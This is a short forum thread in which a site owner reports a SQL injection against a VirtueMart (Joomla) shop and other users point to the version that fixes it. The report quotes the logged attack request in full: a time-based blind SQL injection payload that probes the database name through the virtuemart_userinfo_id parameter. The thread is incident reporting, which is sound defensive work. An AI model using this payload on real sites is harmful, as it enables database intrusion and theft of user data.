News:

Looking for documentation? Take a look on our wiki

Main Menu

SQL injection

Started by Arkadiy, October 03, 2013, 05:10:27 AM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Arkadiy

October 03, 2013, 05:10:27 AM
Щn one of my sites using the SQL injection was considered users. The injection took place in such a query:
Code Select
GET /index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=1%22and(IF(ASCII(SUBSTRING((SELECT%20Database()),2,1))=112,BENCHMARK(51544503,MD5(1)),1))and%221%22=%221 HTTP/1.0

AH

#1
October 03, 2013, 09:31:28 AM
Version of VM?
Regards
A

Joomla 3.10.11
php 8.0

alatak

#2
October 04, 2013, 08:53:24 AM
Hello

This is issue is fixed in vm2.0.22c

AH

#3
October 04, 2013, 09:42:04 AM
Thank Alatak
Regards
A

Joomla 3.10.11
php 8.0

Arkadiy

#4
October 04, 2013, 20:16:50 PM
Good.
Print
Go Up Pages1
User actions